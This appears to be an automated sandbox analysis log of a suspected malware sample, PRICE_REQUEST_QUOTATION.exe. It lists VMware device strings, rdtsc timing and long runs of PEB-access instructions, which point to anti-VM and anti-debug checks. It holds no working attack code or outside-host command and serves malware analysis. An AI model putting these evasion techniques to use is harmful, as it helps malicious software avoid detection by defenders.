Source: explorer.exe, 00000006.00000000.276302180.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.290796557.0000000008C5E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.298466156.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_004088E0 rdtsc

3_2_004088E0

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A402 mov eax, dword ptr fs:[00000030h]	0_2_7333A402
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A706 mov eax, dword ptr fs:[00000030h]	0_2_7333A706
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A744 mov eax, dword ptr fs:[00000030h]	0_2_7333A744
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A616 mov eax, dword ptr fs:[00000030h]	0_2_7333A616
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A6C7 mov eax, dword ptr fs:[00000030h]	0_2_7333A6C7
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A190AF mov eax, dword ptr fs:[00000030h]	3_2_00A190AF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9080 mov eax, dword ptr fs:[00000030h]	3_2_009D9080
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov ecx, dword ptr fs:[00000030h]	3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h]	3_2_00A0F0BF
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h]	3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h]	3_2_00A53884
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]	3_2_00A6B8D0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]	3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]	3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]	3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]	3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]	3_2_00A0002D
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]	3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]	3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]	3_2_00A57016
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]	3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]	3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]	3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]	3_2_009EB02A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h]	3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h]	3_2_00AA4015
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h]	3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h]	3_2_009F0050
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A92073 mov eax, dword ptr fs:[00000030h]	3_2_00A92073
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA1074 mov eax, dword ptr fs:[00000030h]	3_2_00AA1074
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h]	3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h]	3_2_00A061A0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A569A6 mov eax, dword ptr fs:[00000030h]	3_2_00A569A6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]	3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]	3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]	3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]	3_2_00A551BE
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FC182 mov eax, dword ptr fs:[00000030h]	3_2_009FC182
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0A185 mov eax, dword ptr fs:[00000030h]	3_2_00A0A185
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A02990 mov eax, dword ptr fs:[00000030h]	3_2_00A02990
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A641E8 mov eax, dword ptr fs:[00000030h]	3_2_00A641E8
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]	3_2_009DB1E1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h]	3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h]	3_2_00A0513A
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]	3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]	3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]	3_2_009D9100
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]	3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]	3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]	3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]	3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov ecx, dword ptr fs:[00000030h]	3_2_009F4120
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h]	3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h]	3_2_009FB944
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h]	3_2_009DB171
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h]	3_2_009DB171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28CD6 mov eax, dword ptr fs:[00000030h]	17_2_04D28CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]	17_2_04CEB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D114FB mov eax, dword ptr fs:[00000030h]	17_2_04D114FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]	17_2_04CD6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59080 mov eax, dword ptr fs:[00000030h]	17_2_04C59080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h]	17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h]	17_2_04CD3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6849B mov eax, dword ptr fs:[00000030h]	17_2_04C6849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C990AF mov eax, dword ptr fs:[00000030h]	17_2_04C990AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov ecx, dword ptr fs:[00000030h]	17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h]	17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h]	17_2_04C8F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A44B mov eax, dword ptr fs:[00000030h]	17_2_04C8A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h]	17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h]	17_2_04C70050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h]	17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h]	17_2_04CEC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D12073 mov eax, dword ptr fs:[00000030h]	17_2_04D12073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D21074 mov eax, dword ptr fs:[00000030h]	17_2_04D21074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7746D mov eax, dword ptr fs:[00000030h]	17_2_04C7746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h]	17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h]	17_2_04D24015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]	17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]	17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]	17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]	17_2_04CD6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]	17_2_04D11C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]	17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]	17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]	17_2_04CD7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]	17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]	17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]	17_2_04D2740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8BC2C mov eax, dword ptr fs:[00000030h]	17_2_04C8BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]	17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]	17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]	17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]	17_2_04C6B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D08DF1 mov eax, dword ptr fs:[00000030h]	17_2_04D08DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04C5B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CE41E8 mov eax, dword ptr fs:[00000030h]	17_2_04CE41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]	17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]	17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C182 mov eax, dword ptr fs:[00000030h]	17_2_04C7C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A185 mov eax, dword ptr fs:[00000030h]	17_2_04C8A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]	17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]	17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]	17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]	17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]	17_2_04C52D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h]	17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h]	17_2_04C8FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h]	17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h]	17_2_04C861A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C835A1 mov eax, dword ptr fs:[00000030h]	17_2_04C835A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h]	17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h]	17_2_04C7B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C93D43 mov eax, dword ptr fs:[00000030h]	17_2_04C93D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3540 mov eax, dword ptr fs:[00000030h]	17_2_04CD3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C77D50 mov eax, dword ptr fs:[00000030h]	17_2_04C77D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C962 mov eax, dword ptr fs:[00000030h]	17_2_04C5C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h]	17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h]	17_2_04C7C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h]	17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h]	17_2_04C5B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]	17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]	17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]	17_2_04C59100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28D34 mov eax, dword ptr fs:[00000030h]	17_2_04D28D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov ecx, dword ptr fs:[00000030h]	17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h]	17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h]	17_2_04C8513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]	17_2_04C63D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]	17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]	17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]	17_2_04C84D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5AD30 mov eax, dword ptr fs:[00000030h]	17_2_04C5AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CDA537 mov eax, dword ptr fs:[00000030h]	17_2_04CDA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28ED6 mov eax, dword ptr fs:[00000030h]	17_2_04D28ED6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C836CC mov eax, dword ptr fs:[00000030h]	17_2_04C836CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C98EC7 mov eax, dword ptr fs:[00000030h]	17_2_04C98EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0FEC0 mov eax, dword ptr fs:[00000030h]	17_2_04D0FEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C676E2 mov eax, dword ptr fs:[00000030h]	17_2_04C676E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C816E0 mov ecx, dword ptr fs:[00000030h]	17_2_04C816E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFE87 mov eax, dword ptr fs:[00000030h]	17_2_04CEFE87
